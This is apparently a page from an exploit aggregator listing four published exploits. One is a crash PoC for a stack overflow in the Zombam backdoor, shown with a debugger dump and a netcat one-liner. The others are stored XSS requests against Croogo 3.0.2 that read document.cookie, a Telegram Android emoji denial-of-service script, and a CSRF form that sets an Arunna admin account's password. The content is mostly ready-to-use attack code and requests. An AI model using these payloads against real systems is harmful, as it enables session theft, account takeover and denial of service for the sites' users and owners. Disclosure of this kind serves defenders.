Latest exploits :: CodePwn

<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022 Original source: https://malvuln.com/advisory/1e3665a67201209609ae493a2a590bee.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.Zombam.b Vulnerability: Remote Stack Buffer Overflow Description: z0mbie's HTTP RAT v0.1a listens on TCP port 80 to display an HTML Web UI for basic remote administration capability. Third-party attackers who can reach an infected system can trigger a buffer overflow overwriting the EBP and EIP registers by sending a specially crafted HTTP request. Type: PE32 MD5: 1e3665a67201209609ae493a2a590bee Vuln ID: MVID-2022-0487 ASLR: False DEP: False Safe SEH: True Disclosure: 02/16/2022 Memory Dump: (148c.dd4): Access violation - code c0000005 (first/second chance not available) eax=00000000 ebx=00000000 ecx=9d082a1a edx=00000000 esi=00000003 edi=00000003 eip=7770ed3c esp=0538f194 ebp=0538f324 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202 ntdll!ZwWaitForMultipleObjects+0xc: 7770ed3c c21400 ret 14h 0:006> .ecxr eax=00000000 ebx=040202b0 ecx=9d082a1a edx=00000000 esi=0538fb51 edi=04020330 eip=41414141 esp=0538fab4 ebp=41414141 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202 41414141 ?? ??? 0:006> !analyze -v ******************************************************************************* * * * Exception Analysis * * * ******************************************************************************* *** WARNING: Unable to verify checksum for Backdoor.Win32.Zombam.b.1e3665a67201209609ae493a2a590bee.exe *** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.Zombam.b.1e3665a67201209609ae493a2a590bee.exe FAULTING_IP: +3485 41414141 ?? ??? EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff) ExceptionAddress: 41414141 ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 00000000 Parameter[1]: 41414141 Attempt to read from address 41414141 PROCESS_NAME: Backdoor.Win32.Zombam.b.1e3665a67201209609ae493a2a590bee.exe ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s. EXCEPTION_PARAMETER1: 00000000 EXCEPTION_PARAMETER2: 41414141 READ_ADDRESS: 41414141 FOLLOWUP_IP: Backdoor_Win32_Zombam_b_1e3665a67201209609ae493a2a590bee+3485 00403485 50 push eax FAILED_INSTRUCTION_ADDRESS: +3485 41414141 ?? ??? MOD_LIST: <ANALYSIS/> NTGLOBALFLAG: 0 APPLICATION_VERIFIER_FLAGS: 0 FAULTING_THREAD: 00000dd4 BUGCHECK_STR: APPLICATION_FAULT_BAD_INSTRUCTION_PTR_INVALID_POINTER_READ_EXPLOITABLE_FILL_PATTERN_41414141 PRIMARY_PROBLEM_CLASS: BAD_INSTRUCTION_PTR_EXPLOITABLE_FILL_PATTERN_41414141 DEFAULT_BUCKET_ID: BAD_INSTRUCTION_PTR_EXPLOITABLE_FILL_PATTERN_41414141 IP_ON_HEAP: 41414141 The fault address in not in any loaded module, please check your build's rebase log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may contain the address if it were loaded. IP_IN_FREE_BLOCK: 41414141 FRAME_ONE_INVALID: 1 LAST_CONTROL_TRANSFER: from 41414141 to 41414141 STACK_TEXT: WARNING: Frame IP not in any known module. Following frames may be wrong. 0538fab0 41414141 41414141 41414141 41414141 0x41414141 0538fab4 41414141 41414141 41414141 41414141 0x41414141 0538fab8 41414141 41414141 41414141 41414141 0x41414141 0538fabc 41414141 41414141 41414141 41414141 0x41414141 0538fac0 41414141 41414141 41414141 41414141 0x41414141 0538fac4 41414141 41414141 41414141 41414141 0x41414141 0538fac8 41414141 41414141 41414141 41414141 0x41414141 0538facc 41414141 41414141 41414141 41414141 0x41414141 0538fad0 41414141 41414141 41414141 41414141 0x41414141 0538fad4 41414141 41414141 41414141 41414141 0x41414141 0538fad8 41414141 41414141 41414141 41414141 0x41414141 0538fadc 41414141 41414141 41414141 41414141 0x41414141 0538fae0 41414141 41414141 41414141 41414141 0x41414141 0538fae4 41414141 41414141 41414141 41414141 0x41414141 0538fae8 41414141 41414141 41414141 41414141 0x41414141 0538faec 41414141 41414141 41414141 41414141 0x41414141 0538faf0 41414141 41414141 41414141 41414141 0x41414141 0538faf4 41414141 41414141 41414141 41414141 0x41414141 0538faf8 41414141 41414141 41414141 41414141 0x41414141 0538fafc 41414141 41414141 41414141 41414141 0x41414141 0538fb00 41414141 41414141 41414141 41414141 0x41414141 0538fb04 41414141 41414141 41414141 41414141 0x41414141 0538fb08 41414141 41414141 41414141 41414141 0x41414141 0538fb0c 41414141 41414141 41414141 41414141 0x41414141 0538fb10 41414141 41414141 41414141 41414141 0x41414141 0538fb14 41414141 41414141 41414141 41414141 0x41414141 0538fb18 41414141 41414141 41414141 41414141 0x41414141 0538fb1c 41414141 41414141 41414141 41414141 0x41414141 0538fb20 41414141 41414141 41414141 41414141 0x41414141 0538fb24 41414141 41414141 41414141 41414141 0x41414141 0538fb28 41414141 41414141 41414141 41414141 0x41414141 0538fb2c 41414141 41414141 41414141 41414141 0x41414141 0538fb30 41414141 41414141 41414141 41414141 0x41414141 0538fb34 41414141 41414141 41414141 41414141 0x41414141 0538fb38 41414141 41414141 41414141 41414141 0x41414141 0538fb3c 41414141 41414141 41414141 41414141 0x41414141 0538fb40 41414141 41414141 41414141 41414141 0x41414141 0538fb44 41414141 41414141 41414141 41414141 0x41414141 0538fb48 41414141 41414141 41414141 41414141 0x41414141 0538fb4c 41414141 41414141 41414141 41414141 0x41414141 0538fb50 41414141 41414141 41414141 41414141 0x41414141 0538fb54 41414141 41414141 41414141 41414141 0x41414141 0538fb58 41414141 41414141 41414141 41414141 0x41414141 0538fb5c 41414141 41414141 41414141 41414141 0x41414141 0538fb60 41414141 41414141 41414141 41414141 0x41414141 0538fb64 41414141 41414141 41414141 41414141 0x41414141 0538fb68 41414141 41414141 41414141 41414141 0x41414141 0538fb6c 41414141 41414141 41414141 41414141 0x41414141 0538fb70 41414141 41414141 41414141 41414141 0x41414141 0538fb74 41414141 41414141 41414141 41414141 0x41414141 0538fb78 41414141 41414141 41414141 41414141 0x41414141 0538fb7c 41414141 41414141 41414141 41414141 0x41414141 0538fb80 41414141 41414141 41414141 41414141 0x41414141 0538fb84 41414141 41414141 41414141 41414141 0x41414141 0538fb88 41414141 41414141 41414141 41414141 0x41414141 0538fb8c 41414141 41414141 41414141 41414141 0x41414141 0538fb90 41414141 41414141 41414141 41414141 0x41414141 0538fb94 41414141 41414141 41414141 41414141 0x41414141 0538fb98 41414141 41414141 41414141 41414141 0x41414141 0538fb9c 41414141 41414141 41414141 41414141 0x41414141 0538fba0 41414141 41414141 41414141 41414141 0x41414141 0538fba4 41414141 41414141 41414141 41414141 0x41414141 0538fba8 41414141 41414141 41414141 41414141 0x41414141 0538fbac 41414141 41414141 41414141 41414141 0x41414141 0538fbb0 41414141 41414141 41414141 41414141 0x41414141 0538fbb4 41414141 41414141 41414141 41414141 0x41414141 0538fbb8 41414141 41414141 41414141 41414141 0x41414141 0538fbbc 41414141 41414141 41414141 41414141 0x41414141 0538fbc0 41414141 41414141 41414141 41414141 0x41414141 0538fbc4 41414141 41414141 41414141 41414141 0x41414141 0538fbc8 41414141 41414141 41414141 41414141 0x41414141 0538fbcc 41414141 41414141 41414141 41414141 0x41414141 0538fbd0 41414141 41414141 41414141 41414141 0x41414141 0538fbd4 41414141 41414141 41414141 41414141 0x41414141 0538fbd8 41414141 41414141 41414141 41414141 0x41414141 0538fbdc 41414141 41414141 41414141 41414141 0x41414141 0538fbe0 41414141 41414141 41414141 41414141 0x41414141 0538fbe4 41414141 41414141 41414141 41414141 0x41414141 0538fbe8 41414141 41414141 41414141 41414141 0x41414141 0538fbec 41414141 41414141 41414141 41414141 0x41414141 0538fbf0 41414141 41414141 41414141 41414141 0x41414141 0538fbf4 41414141 41414141 41414141 41414141 0x41414141 0538fbf8 41414141 41414141 41414141 41414141 0x41414141 0538fbfc 41414141 41414141 41414141 41414141 0x41414141 0538fc00 41414141 41414141 41414141 41414141 0x41414141 0538fc04 41414141 41414141 41414141 41414141 0x41414141 0538fc08 41414141 41414141 41414141 41414141 0x41414141 0538fc0c 41414141 41414141 41414141 41414141 0x41414141 0538fc10 41414141 41414141 41414141 41414141 0x41414141 0538fc14 41414141 41414141 41414141 41414141 0x41414141 0538fc18 41414141 41414141 41414141 41414141 0x41414141 0538fc1c 41414141 41414141 41414141 41414141 0x41414141 0538fc20 41414141 41414141 41414141 41414141 0x41414141 0538fc24 41414141 41414141 41414141 41414141 0x41414141 0538fc28 41414141 41414141 41414141 41414141 0x41414141 0538fc2c 41414141 41414141 41414141 41414141 0x41414141 0538fc30 41414141 41414141 41414141 41414141 0x41414141 0538fc34 41414141 41414141 41414141 41414141 0x41414141 0538fc38 41414141 41414141 41414141 41414141 0x41414141 0538fc3c 41414141 41414141 41414141 41414141 0x41414141 0538fc40 41414141 41414141 41414141 41414141 0x41414141 0538fc44 41414141 41414141 41414141 41414141 0x41414141 0538fc48 41414141 41414141 41414141 41414141 0x41414141 0538fc4c 41414141 41414141 41414141 41414141 0x41414141 0538fc50 41414141 41414141 41414141 41414141 0x41414141 0538fc54 41414141 41414141 41414141 41414141 0x41414141 0538fc58 41414141 41414141 41414141 41414141 0x41414141 0538fc5c 41414141 41414141 41414141 41414141 0x41414141 0538fc60 41414141 41414141 41414141 41414141 0x41414141 0538fc64 41414141 41414141 41414141 41414141 0x41414141 0538fc68 41414141 41414141 41414141 41414141 0x41414141 0538fc6c 41414141 41414141 41414141 41414141 0x41414141 0538fc70 41414141 41414141 41414141 41414141 0x41414141 0538fc74 41414141 41414141 41414141 41414141 0x41414141 0538fc78 41414141 41414141 41414141 41414141 0x41414141 0538fc7c 41414141 41414141 41414141 41414141 0x41414141 0538fc80 41414141 41414141 41414141 41414141 0x41414141 0538fc84 41414141 41414141 41414141 41414141 0x41414141 0538fc88 41414141 41414141 41414141 41414141 0x41414141 0538fc8c 41414141 41414141 41414141 41414141 0x41414141 0538fc90 41414141 41414141 41414141 41414141 0x41414141 0538fc94 41414141 41414141 41414141 41414141 0x41414141 0538fc98 41414141 41414141 41414141 41414141 0x41414141 0538fc9c 41414141 41414141 41414141 41414141 0x41414141 0538fca0 41414141 41414141 41414141 41414141 0x41414141 0538fca4 41414141 41414141 41414141 41414141 0x41414141 0538fca8 41414141 41414141 41414141 41414141 0x41414141 0538fcac 41414141 41414141 41414141 41414141 0x41414141 0538fcb0 41414141 41414141 41414141 41414141 0x41414141 0538fcb4 41414141 41414141 41414141 41414141 0x41414141 0538fcb8 41414141 41414141 41414141 41414141 0x41414141 0538fcbc 41414141 41414141 41414141 41414141 0x41414141 0538fcc0 41414141 41414141 41414141 41414141 0x41414141 0538fcc4 41414141 41414141 41414141 41414141 0x41414141 0538fcc8 41414141 41414141 41414141 41414141 0x41414141 0538fccc 41414141 41414141 41414141 41414141 0x41414141 0538fcd0 41414141 41414141 41414141 41414141 0x41414141 0538fcd4 41414141 41414141 41414141 41414141 0x41414141 0538fcd8 41414141 41414141 41414141 41414141 0x41414141 0538fcdc 41414141 41414141 41414141 41414141 0x41414141 0538fce0 41414141 41414141 41414141 41414141 0x41414141 0538fce4 41414141 41414141 41414141 41414141 0x41414141 0538fce8 41414141 41414141 41414141 41414141 0x41414141 0538fcec 41414141 41414141 41414141 41414141 0x41414141 0538fcf0 41414141 41414141 41414141 41414141 0x41414141 0538fcf4 41414141 41414141 41414141 41414141 0x41414141 0538fcf8 41414141 41414141 41414141 41414141 0x41414141 0538fcfc 41414141 41414141 41414141 41414141 0x41414141 0538fd00 41414141 41414141 41414141 41414141 0x41414141 0538fd04 41414141 41414141 41414141 41414141 0x41414141 0538fd08 41414141 41414141 41414141 41414141 0x41414141 0538fd0c 41414141 41414141 41414141 41414141 0x41414141 0538fd10 41414141 41414141 41414141 41414141 0x41414141 0538fd14 41414141 41414141 41414141 41414141 0x41414141 0538fd18 41414141 41414141 41414141 41414141 0x41414141 0538fd1c 41414141 41414141 41414141 41414141 0x41414141 0538fd20 41414141 41414141 41414141 41414141 0x41414141 0538fd24 41414141 41414141 41414141 41414141 0x41414141 0538fd28 41414141 41414141 41414141 41414141 0x41414141 0538fd2c 41414141 41414141 41414141 41414141 0x41414141 0538fd30 41414141 41414141 41414141 41414141 0x41414141 0538fd34 41414141 41414141 41414141 41414141 0x41414141 0538fd38 41414141 41414141 41414141 41414141 0x41414141 0538fd3c 41414141 41414141 41414141 41414141 0x41414141 0538fd40 41414141 41414141 41414141 41414141 0x41414141 0538fd44 41414141 41414141 41414141 41414141 0x41414141 0538fd48 41414141 41414141 41414141 41414141 0x41414141 0538fd4c 41414141 41414141 41414141 41414141 0x41414141 0538fd50 41414141 41414141 41414141 41414141 0x41414141 0538fd54 41414141 41414141 41414141 41414141 0x41414141 0538fd58 41414141 41414141 41414141 41414141 0x41414141 0538fd5c 41414141 41414141 41414141 41414141 0x41414141 0538fd60 41414141 41414141 41414141 41414141 0x41414141 0538fd64 41414141 41414141 41414141 41414141 0x41414141 0538fd68 41414141 41414141 41414141 41414141 0x41414141 0538fd6c 41414141 41414141 41414141 41414141 0x41414141 0538fd70 41414141 41414141 41414141 41414141 0x41414141 0538fd74 41414141 41414141 41414141 41414141 0x41414141 0538fd78 41414141 41414141 41414141 41414141 0x41414141 0538fd7c 41414141 41414141 41414141 41414141 0x41414141 0538fd80 41414141 41414141 41414141 41414141 0x41414141 0538fd84 41414141 41414141 41414141 41414141 0x41414141 0538fd88 41414141 41414141 41414141 41414141 0x41414141 0538fd8c 41414141 41414141 41414141 41414141 0x41414141 0538fd90 41414141 41414141 41414141 41414141 0x41414141 0538fd94 41414141 41414141 41414141 41414141 0x41414141 0538fd98 41414141 41414141 41414141 41414141 0x41414141 0538fd9c 41414141 41414141 41414141 41414141 0x41414141 0538fda0 41414141 41414141 41414141 41414141 0x41414141 0538fda4 41414141 41414141 41414141 41414141 0x41414141 0538fda8 41414141 41414141 41414141 41414141 0x41414141 0538fdac 41414141 41414141 41414141 41414141 0x41414141 0538fdb0 41414141 41414141 41414141 41414141 0x41414141 0538fdb4 41414141 41414141 41414141 41414141 0x41414141 0538fdb8 41414141 41414141 41414141 41414141 0x41414141 0538fdbc 41414141 41414141 41414141 41414141 0x41414141 0538fdc0 41414141 41414141 41414141 41414141 0x41414141 0538fdc4 41414141 41414141 41414141 41414141 0x41414141 0538fdc8 41414141 41414141 41414141 41414141 0x41414141 0538fdcc 41414141 41414141 41414141 41414141 0x41414141 0538fdd0 41414141 41414141 41414141 41414141 0x41414141 0538fdd4 41414141 41414141 41414141 41414141 0x41414141 0538fdd8 41414141 41414141 41414141 41414141 0x41414141 0538fddc 41414141 41414141 41414141 41414141 0x41414141 0538fde0 41414141 41414141 41414141 41414141 0x41414141 0538fde4 41414141 41414141 41414141 41414141 0x41414141 0538fde8 41414141 41414141 41414141 41414141 0x41414141 0538fdec 41414141 41414141 41414141 41414141 0x41414141 0538fdf0 41414141 41414141 41414141 41414141 0x41414141 0538fdf4 41414141 41414141 41414141 41414141 0x41414141 0538fdf8 41414141 41414141 41414141 41414141 0x41414141 0538fdfc 41414141 41414141 41414141 41414141 0x41414141 0538fe00 41414141 41414141 41414141 41414141 0x41414141 0538fe04 41414141 41414141 41414141 41414141 0x41414141 0538fe08 41414141 41414141 41414141 41414141 0x41414141 0538fe0c 41414141 41414141 41414141 41414141 0x41414141 0538fe10 41414141 41414141 41414141 41414141 0x41414141 0538fe14 41414141 41414141 41414141 41414141 0x41414 STACK_COMMAND: ~6s; .ecxr ; kb SYMBOL_STACK_INDEX: e9 SYMBOL_NAME: Backdoor_Win32_Zombam_b_1e3665a67201209609ae493a2a590bee+3485 FOLLOWUP_NAME: MachineOwner MODULE_NAME: Backdoor_Win32_Zombam_b_1e3665a67201209609ae493a2a590bee IMAGE_NAME: Backdoor.Win32.Zombam.b.1e3665a67201209609ae493a2a590bee.exe DEBUG_FLR_IMAGE_TIMESTAMP: 3e780ebf FAILURE_BUCKET_ID: BAD_INSTRUCTION_PTR_EXPLOITABLE_FILL_PATTERN_41414141_c0000005_Backdoor.Win32.Zombam.b.1e3665a67201209609ae493a2a590bee.exe!Unknown BUCKET_ID: APPLICATION_FAULT_BAD_INSTRUCTION_PTR_INVALID_POINTER_READ_EXPLOITABLE_FILL_PATTERN_41414141_BAD_IP_Backdoor_Win32_Zombam_b_1e3665a67201209609ae493a2a590bee+3485 Exploit/PoC: python -c "print('GET /'+'A'*15028 +' HTTP/1.0\r\nHost: 192.168.18.125\r\n\r\n')" | nc64.exe 192.168.18.125 80 -v 125.18.168.192.in-addr.arpa [192.168.18.125] 80 (http) open Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM). </code></pre>

<pre><code># Exploit Title: Croogo 3.0.2 - 'Multiple' Stored Cross-Site Scripting (XSS) # Date: 06/12/2021 # Exploit Author: Enes Özeser # Vendor Homepage: https://croogo.org/ # Software Link: https://downloads.croogo.org/v3.0.2.zip # Version: 3.0.2 # Tested on: Windows 10 Home Single Language 20H2 & WampServer 3.2.3 ==> 'Content-Type' Stored Cross-Site Scripting (/admin/file-manager/attachments/add) <== POST /admin/file-manager/attachments/add HTTP/1.1 Host: (HOST) User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------114221148012003093972656004730 Content-Length: 923 Origin: http://(HOST) Connection: close Referer: http://(HOST)/admin/file-manager/attachments/add Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 -----------------------------114221148012003093972656004730 Content-Disposition: form-data; name="_method" POST -----------------------------114221148012003093972656004730 Content-Disposition: form-data; name="_csrfToken" c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a -----------------------------114221148012003093972656004730 Content-Disposition: form-data; name="file"; filename="file.txt" Content-Type: <script>alert(document.cookie)</script> Enes Ozeser (@enesozeser) -----------------------------114221148012003093972656004730 Content-Disposition: form-data; name="_Token[fields]" 16ade00fae1eb7183f11fe75ed658ae4ec2a5921%3A -----------------------------114221148012003093972656004730 Content-Disposition: form-data; name="_Token[unlocked]" -----------------------------114221148012003093972656004730-- ==> 'title' Stored Cross-Site Scripting (/admin/taxonomy/types/edit/) <== POST /admin/taxonomy/types/edit/5 HTTP/1.1 Host: (HOST) User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 590 Origin: http://(HOST) Connection: close Referer: http://(HOST)admin/taxonomy/types/edit/5 Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 _method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a& title=<script>alert(document.cookie)</script>&alias=Alias&description=Description&vocabularies[_ids]=&comment_status=&comment_status=2&comment_approve=0& comment_approve=1&comment_spam_protection=0&comment_captcha=0&params=routes=true&format_show_author=0&format_show_author=1&format_show_date=0&format_show_date=1& format_use_wysiwyg=0&format_use_wysiwyg=1&_Token[fields]=ee5145e2485f47bddda98c72f96db218bffdd827%3A&_Token[unlocked]=_apply ==> 'title' Stored Cross-Site Scripting (/admin/blocks/regions/edit/) <== POST /admin/blocks/regions/edit/3 HTTP/1.1 Host: (HOST) User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 336 Origin: http://(HOST) Connection: close Referer: http://(HOST)/admin/blocks/regions/edit/3 Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 _method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a& title=<script>alert(document.cookie)</script>&alias=Alias&_Token[fields]=49781a41a2787c301464989f09805bc79fa26c13%3A&_Token[unlocked]=_apply ==> 'title' Stored Cross-Site Scripting (/admin/file-manager/attachments/edit/) <== POST /admin/file-manager/attachments/edit/20 HTTP/1.1 Host: (HOST) User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 363 Origin: http://(HOST) Connection: close Referer: http://(HOST)/admin/file-manager/attachments/edit/20 Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 _method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a& title=<script>alert(document.cookie)</script>&excerpt=&file_url=http://(HOST)/uploads/file.txt&file_type=text/plain&_Token[fields]=6170a60e541f596fe579a5e70fea879aafb9ac14%3A&_Token[unlocked]=_apply </code></pre>

<pre><code>Document Title: =============== Telegram Android v8.4.4 - Denial of Service (PoC) References (Source): ==================== https://twitter.com/h4shur Release Date: ============= 2022-01-30 Common Vulnerability Scoring System: ==================================== 7.8 Product & Service Introduction: =============================== Telegram is a freeware, cross-platform, cloud-based instant messaging (IM) service. The service also provides end-to-end encrypted video calling, VoIP, file sharing and several other features. It was launched for iOS on 14 August 2013 and Android in October 2013. The servers of Telegram are distributed worldwide to decrease frequent data load with five data centers in different regions, while the operational center is based in Dubai in the United Arab Emirates. Various client apps are available for desktop and mobile platforms including official apps for Android, iOS, Windows, macOS and Linux (although registration requires an iOS or Android device and a working phone number). There are also two official Telegram web twin apps – WebK and WebZ – and numerous unofficial clients that make use of Telegram's protocol. All of Telegram's official components are open source, with the exception of the server which is closed-sourced and proprietary. Telegram provides end-to-end encrypted voice and video calls and optional end-to-end encrypted "secret" chats. Cloud chats and groups are encrypted between the app and the server, so that ISPs and other third-parties on the network can't access data, but the Telegram server can. Users can send text and voice messages, make voice and video calls, and share an unlimited number of images, documents (2 GB per file), user locations, animated stickers, contacts, and audio files. In January 2021, Telegram surpassed 500 million monthly active users. It was the most downloaded app worldwide in January 2021 with 1 billion downloads globally as of late August 2021. Abstract Advisory Information: ============================== An independent vulnerability researcher discovered Android application vulnerabilities in the Telegram application. Affected Product(s): ==================== Vendor: telegram.org / telegram.me / t.me Product: Android Telegram application (Android-Application) https://telegram.org/android Vulnerability Disclosure Timeline: ================================== 2022-01-30: Researcher Notification & Coordination (Security Researcher) 2022-01-30: Public Disclosure Discovery Status: ================= Published Exploitation Technique: ======================= local Severity Level: =============== medium Disclosure Type: ================ Full Disclosure Technical specifications and description: ================================ 1.1 In version 8.4.4 of Android Telegram application, a denial of service vulnerability was discovered by H4shur. Vulnerability is in the emojis of these messenger. 1.2 If you send a number of flag emojis with any text on the chat page, clicking on that message will stop the program altogether and avoid providing services. Proof of Concept (PoC): ======================= 1.1 A Denial of Service (DOS) attack is a type of cyberattack in which a malicious person performs an attack with the aim of removing the resources of a system from the reach of its users. It is natural that if this attack is successful, the result will be a slowdown or disabling of the equipment and resources available to the victim. For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue. PoC: Exploitation 1.1 Run the python script, it will create a new file "outputbufferh4shur.txt". 1.2 Run Telegram Android and go to "Saved Messages" or any Chat page. 1.3 Copy the content of the file "outputbufferh4shur.txt". 1.4 Paste the content of outputbufferh4shur.txt into the "Write a message..." and then type any text to this message. 1.5 Ops... Telegram Crashed <3 script: bufferh4shur = "🇮🇷" * 114 try: f=open("outputbufferh4shur.txt","w") print("[!] Creating %s bytes DOS payload...." %len(bufferh4shur)) f.write(bufferh4shur) f.close() print("[!] File Created!") except: print("File cannot be created!") Security Risk: ============== 1.1 A Denial of Service (DOS) attack is a type of cyberattack in which a malicious person performs an attack with the aim of removing the resources of a system from the reach of its users. It is natural that if this attack is successful, the result will be a slowdown or disabling of the equipment and resources available to the victim. Credits & Authors: ================== h4shur Twitter: @h4shur ; Telegram: @h4shur ; Instagram: @h4shur h4shursec@gmail.com </code></pre>

<pre><code># Exploit Title: Arunna 1.0.0 - 'Multiple' Cross-Site Request Forgery (CSRF) # Date: November 29, 2021 # Exploit Author: =(L_L)= # Detailed Bug Description: https://lyhinslab.org/index.php/2021/11/29/how-white-box-hacking-works-xss-csrf-in-arunna/ # Vendor Homepage: https://github.com/arunna # Software Link: https://github.com/arunna/arunna # Version: 1.0.0 # Tested on: Ubuntu 20.04.2 LTS  <html><form enctype="application/x-www-form-urlencoded" method="POST" action="http://{domain}/lumonata-admin/?state=users&prc=edit&id=1"><table><tr><td>username[0]</td><td><input type="text" value="admin" name="username[0]"></td></tr><tr><td>select[0]</td><td><input type="text" value="" name="select[0]"></td></tr> <tr><td>first_name[0]</td><td><input type="text" value="Raden" name="first_name[0]"></td></tr> <tr><td>last_name[0]</td><td><input type="text" value="Yudistira" name="last_name[0]"></td></tr> <tr><td>display_name[0]</td><td><input type="text" value="Raden Yudistira" name="display_name[0]"></td></tr> <tr><td>one_liner[0]</td><td><input type="text" value="" name="one_liner[0]"></td></tr> <tr><td>location[0]</td><td><input type="text" value="" name="location[0]"></td></tr> <tr><td>sex[0]</td><td><input type="text" value="1" name="sex[0]"></td></tr> <tr><td>birthday[0]</td><td><input type="text" value="19" name="birthday[0]"></td></tr> <tr><td>birthmonth[0]</td><td><input type="text" value="3" name="birthmonth[0]"></td></tr> <tr><td>birthyear[0]</td><td><input type="text" value="2011" name="birthyear[0]"></td></tr> <tr><td>bio[0]</td><td><input type="text" value="" name="bio[0]"></td></tr> <tr><td>expertise[0][]</td><td><input type="text" value="5" name="expertise[0][]"></td></tr> <tr><td>tags[0]</td><td><input type="text" value="Graphic Designer, Blogger, Director" name="tags[0]"></td></tr> <tr><td>skills[0]</td><td><input type="text" value="Cooking, JQuery, Fireworks" name="skills[0]"></td></tr> <tr><td>email[0]</td><td><input type="text" value="request@arunna.com" name="email[0]"></td></tr> <tr><td>website[0]</td><td><input type="text" value="http://" name="website[0]"></td></tr> <tr><td>password[0]</td><td><input type="text" value="admin12345" name="password[0]"></td></tr> <tr><td>re_password[0]</td><td><input type="text" value="admin12345" name="re_password[0]"></td></tr> <tr><td>user_type[0]</td><td><input type="text" value="administrator" name="user_type[0]"></td></tr> <tr><td>status[0]</td><td><input type="text" value="1" name="status[0]"></td></tr> <tr><td>save_changes</td><td><input type="text" value="Save User" name="save_changes"></td></tr> </table><input type="submit" value="http://{domain}/lumonata-admin/?state=users&prc=edit&id=1"></form></html> </code></pre>

